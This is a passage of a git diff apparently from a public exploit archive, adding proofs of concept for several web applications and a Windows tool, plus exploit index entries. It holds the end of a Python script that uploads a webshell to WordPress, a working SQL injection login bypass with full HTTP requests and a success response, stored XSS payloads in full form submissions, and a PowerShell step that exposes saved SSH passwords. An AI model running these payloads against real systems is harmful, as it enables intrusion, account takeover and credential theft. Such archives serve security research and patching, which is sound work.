\n \n\n\n\r\n-----------------------------121585879226594965303252407916--\r\n" +session.post(exploit_url, headers=header, data=shell_payload) +print('[*] Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/' + str(datetime.now().strftime('%Y')) + '/' + str(datetime.now().strftime('%m')) + '/shell.php') +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50582.txt b/exploits/php/webapps/50582.txt new file mode 100644 index 000000000..148e7b497 --- /dev/null +++ b/exploits/php/webapps/50582.txt @@ -0,0 +1,104 @@ +# Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass +# Exploit Author: able403 +# Date: 08/12/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip +# Version: 1.0 +# Tested on: windows 10 +# Vulnerable page: Actions.php +# VUlnerable parameters: "username" + +Technical description: + +An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication. + +Steps to exploit: + +1) Navigate to http://localhost/login.php + +2) Insert your payload in the user or password field + +3) Click login + +Proof of concept (Poc): + +The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - + +123'+or+1=1+--+- + + + + +--- + + + + +POST /Actions.php?a=employee_login HTTP/1.1 + +Host: localhost + +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +X-Requested-With: XMLHttpRequest + +Content-Length: 43 + +Origin: http://edtms.com + +Connection: close + +Referer: http://edtms.com/login.php + +Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl + + + + +email=admin'+or+1=1+--+-&password=123123213 + + + + +response + + + + +HTTP/1.1 200 OK + +Date: Wed, 10 Nov 2021 02:23:38 GMT + +Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 + +X-Powered-By: PHP/8.0.2 + +Expires: Thu, 19 Nov 1981 08:52:00 GMT + +Cache-Control: no-store, no-cache, must-revalidate + +Pragma: no-cache + +Connection: close + +Content-Type: text/html; charset=UTF-8 + +Content-Length: 48 + + + + +{"status":"success","msg":"Login successfully."} + + + + +--- \ No newline at end of file diff --git a/exploits/php/webapps/50583.txt b/exploits/php/webapps/50583.txt new file mode 100644 index 000000000..e3f5cce78 --- /dev/null +++ b/exploits/php/webapps/50583.txt @@ -0,0 +1,222 @@ +# Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS) +# Exploit Author: able403 +# Date: 08/12/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip +# Version: 1.0 +# Tested on: windows 10 +# Vulnerable page: ?page=view_task&id=2 + +Technical description: + +A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. + +xss-1: + +1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task" +2) Insert your payload in the "title" and "Task Description" parameter parameter +3) Click save + +Proof of concept (Poc): + +The following payload will allow you to run the javascript - + +"> + +--- +POST /Actions.php?a=save_task HTTP/1.1 + +Host: localhost + +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +X-Requested-With: XMLHttpRequest + +Content-Length: 312 + +Origin: http://localhost + +Connection: close + +Referer: http://localhost/?page=tasks + +Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl + + + + +id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E + + + + + + + +xss-2 + +1) Navigate to http://localhost.com/?page=manage_account +2) Insert your payload in the "full name" or "contact" or "email" parameter parameter + +Proof of concept (Poc): + +The following payload will allow you to run the javascript - + +"> + + + + +-- + +POST /Actions.php?a=update_credentials_employee HTTP/1.1 + +Host: localhost + +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384 + +Content-Length: 1613 + +Origin: http://localhost + +Connection: close + +Referer: http://localhost/?page=manage_account + +Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl + + + + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="id" + + + + +1 + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="fullname" + + + + +John D Smith + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="gender" + + + + +Male + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="dob" + + + + +1997-06-23 + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="contact" + + + + +098123456789"> + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="email" + + + + +jsmith@sample.com + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="address" + + + + +Sample Address + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="department_id" + + + + +1 + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="email" + + + + +jsmith@sample.com + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="password" + + + + + + + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="old_password" + + + + + + + +-----------------------------27882107026209045483167935384 + +Content-Disposition: form-data; name="avatar"; filename="" + +Content-Type: application/octet-stream + + + + + + + +-----------------------------27882107026209045483167935384-- \ No newline at end of file diff --git a/exploits/windows/local/50574.txt b/exploits/windows/local/50574.txt new file mode 100644 index 000000000..4d76fdc3e --- /dev/null +++ b/exploits/windows/local/50574.txt @@ -0,0 +1,15 @@ +# Exploit Title: MTPutty 1.0.1.21 - SSH Password Disclosure +# Exploit Author: Sedat Ozdemir +# Version: 1.0.1.21 +# Date: 06/12/2021 +# Vendor Homepage: https://ttyplus.com/multi-tabbed-putty/ +# Tested on: Windows 10 + +Proof of Concept +================ + +Step 1: Open MTPutty and add a new SSH connection. +Step 2: Click double times and connect to the server. +Step 3: Run run “Get-WmiObject Win32_Process | select name, commandline | +findstr putty.exe” on powershell. +Step 4: You can see the hidden password on PowerShell terminal. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 553b1b86f..f25e60777 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11423,6 +11423,7 @@ id,file,description,date,author,type,platform,port 50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows, 50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows, 50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, +50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18576,6 +18577,7 @@ id,file,description,date,author,type,platform,port 50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware, 50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware, 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware, +50576,exploits/linux/remote/50576.py,"Raspberry Pi 5.10 - Default Credentials",1970-01-01,netspooky,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44658,3 +44660,12 @@ id,file,description,date,author,type,platform,port 50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php, 50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php, 50570,exploits/php/webapps/50570.txt,"Croogo 3.0.2 - Remote Code Execution (Authenticated)",1970-01-01,"Deha Berkin Bir",webapps,php, +50571,exploits/php/webapps/50571.py,"Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)",1970-01-01,0z09e,webapps,php, +50572,exploits/php/webapps/50572.py,"Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)",1970-01-01,0z09e,webapps,php, +50573,exploits/php/webapps/50573.py,"LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Y1LD1R1M,webapps,php, +50578,exploits/php/webapps/50578.txt,"TestLink 1.19 - Arbitrary File Download (Unauthenticated)",1970-01-01,"Gonzalo Villegas",webapps,php, +50579,exploits/php/webapps/50579.txt,"Student Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Enes Özeser",webapps,php, +50580,exploits/php/webapps/50580.py,"Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php, +50581,exploits/multiple/webapps/50581.py,"Grafana 8.3.0 - Directory Traversal and Arbitrary File Read",1970-01-01,s1gh,webapps,multiple, +50582,exploits/php/webapps/50582.txt,"Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass",1970-01-01,able403,webapps,php, +50583,exploits/php/webapps/50583.txt,"Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)",1970-01-01,able403,webapps,php,